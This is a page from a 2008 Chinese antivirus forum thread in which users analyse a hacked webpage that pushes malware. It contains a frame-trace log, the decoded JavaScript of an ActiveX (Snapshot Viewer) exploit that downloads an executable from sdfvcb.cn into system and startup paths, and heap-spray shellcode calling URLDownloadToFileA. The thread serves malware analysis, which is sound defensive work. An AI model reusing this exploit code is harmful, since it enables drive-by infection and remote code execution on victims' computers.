12
返回列表 发新帖
楼主: 九皇苍志狼
收起左侧

[病毒样本] ★打开网页显示缺少对象:www.mthghd.cn/7/as.htm这是哪里?★

[复制链接]
star_xing
发表于 2008-10-21 22:34:56 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
qigang
发表于 2008-10-21 22:49:09 | 显示全部楼层
Log is generated by FreShow.
[wide]http://www.shangzhi.org/bible
    [script]http://aaa.a5mm.com/tj.js
        [script]http://js.users.51.la/2195020.js
        [frame]http://www.mthghd.cn/12/zz.htm
            [frame]http://www.mthghd.cn/12/123.htm
                [frame]http://www.mthghd.cn/12/flash.htm
                    [frame]http://www.mthghd.cn/12/fl/ifl.html
                    [frame]http://www.mthghd.cn/12/fl/ffl.html
                [frame]http://www.mthghd.cn/12/as.htm
                    [object]http://www.sdfvcb.cn/2.exe
                [frame]http://www.mthghd.cn/12/14.htm
                    [object]http://www.sdfvcb.cn/2.exe
                [frame]http://www.mthghd.cn/12/lz.htm
                    [object]http://www.sdfvcb.cn/2.exe
                [frame]http://www.mthghd.cn/12/sina.htm
                    [object]http://www.sdfvcb.cn/2.exe
                [frame]http://www.mthghd.cn/12/office.htm
                    [object]http://www.sdfvcb.cn/2.exe
                [frame]http://www.mthghd.cn/12/NCTAudioFile.htm
                    [object]http://www.sdfvcb.cn/2.exe
                [frame]http://www.mthghd.cn/12/re10.htm
                    [object]http://www.sdfvcb.cn/2.exe
                [frame]http://www.mthghd.cn/12/re11.htm
                    [object]http://www.sdfvcb.cn/2.exe
            [script]http://s36.cnzz.com/stat.php?id=1046191&web_id=1046191
            [script]http://v11.cnzz.com/stat.php?id=954979&web_id=954979
    [script]http://aaa.a5mm.com/tj.js
    [script]http://aaa.a5mm.com/tj.js
雨宫优子
发表于 2008-10-21 22:50:55 | 显示全部楼层
原帖由 qigang 于 2008-10-21 22:49 发表
Log is generated by FreShow.
[wide]http://www.shangzhi.org/bible
    [script]http://aaa.a5mm.com/tj.js
        [script]http://js.users.51.la/2195020.js
        [frame]http://www.mthghd.cn/12/zz.ht ...

发得比我还早 ............
雨宫优子
发表于 2008-10-21 23:14:16 | 显示全部楼层
function killErrors() { return true; } window.onerror = killErrors; var x; var obj; var mycars = new Array(); mycars[0] = "c:/Program Files/Outlook Express/wab.exe"; mycars[1] = "d:/Program Files/Outlook Express/wab.exe"; mycars[2] = "e:/Program Files/Outlook Express/wab.exe"; mycars[3] = "C:/Documents and Settings/Administrator/「开始」菜单/程序/启动/Thunder.exe"; var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1"); if(objlcx="[object]") { setTimeout('window.location = "ldap://"',3000); for (x in mycars) { obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1") var buf1 = 'http://www.sdfvcb.cn/2.exe'; var buf2=mycars[x]; obj.Zoom = 0; obj.ShowNavigationButtons = false; obj.AllowContextMenu = false; obj.SnapshotPath = buf1; try { obj.CompressedPath = buf2; obj.PrintSnapshot(); }catch(e){} } }
function killErrors() {
return true;
}
window.onerror = killErrors;

var x;
var obj;
var mycars = new Array();
mycars[0] = "c:/Program Files/Outlook Express/wab.exe";
mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
mycars[2] = "e:/Program Files/Outlook Express/wab.exe";
mycars[3] = "C:/Documents and Settings/Administrator/「开始」菜单/程序/启动/Thunder.exe";

var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");

if(objlcx="[object]")
{

setTimeout('window.location = "ldap://"',3000);


for (x in mycars)
{
obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")

var buf1 = 'http://www.sdfvcb.cn/2.exe';
var buf2=mycars[x];

obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = buf1;

try
{
   obj.CompressedPath = buf2;
   obj.PrintSnapshot();

}catch(e){}

}
}

这个是as.htm最终解密的东西...弹代码真不错...
雨宫优子
发表于 2008-10-21 23:19:24 | 显示全部楼层

回复 11楼 star_xing 的帖子

此位仁兄要小心哪

你有漏洞...
雨宫优子
发表于 2008-10-21 23:35:48 | 显示全部楼层
---------------------------
Windows Internet Explorer
---------------------------
var sCode=unescape("VSUVWl$E<TxJZ 2I4118t;|$uZ$fKZ1_^][^j0Yd[[[ShNShNPZRRRSh|ZMYQRrZ[YjjQRjShMZRShDYjQSh~sjurlmon.dllURLDownloadToFileA..\v..\vhttp://www.sdfvcb.cn/2.exe");var sSlide=unescape("");var heapSA=0x0c0c0c0c;function tryMe(){var buffSize=5200;var x=unescape(" c c c c");while(x.length<buffSize)x+=x;x=x.substring(0,buffSize);boom.SetFormatLikeSample(x)}function getsSlide(sSlide,sSlideSize){while(sSlide.length*2<sSlideSize){sSlide+=sSlide}sSlide=sSlide.substring(0,sSlideSize/2);return(sSlide)}var heapBS=0x400000;var sizeHDM=0x5;var PLSize=(sCode.length*2);var sSlideSize=heapBS-(PLSize+sizeHDM);var heapBlocks=(heapSA+heapBS)/heapBS;var memory=new Array();sSlide=getsSlide(sSlide,sSlideSize);for(i=0;i<heapBlocks;i++){memory=sSlide+sCode}
---------------------------
确定   
---------------------------
我的水平还是臭了点...有些挂马还得用alert解决...
欠妳緈諨
发表于 2008-10-21 23:52:47 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-16 11:08 , Processed in 0.097197 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表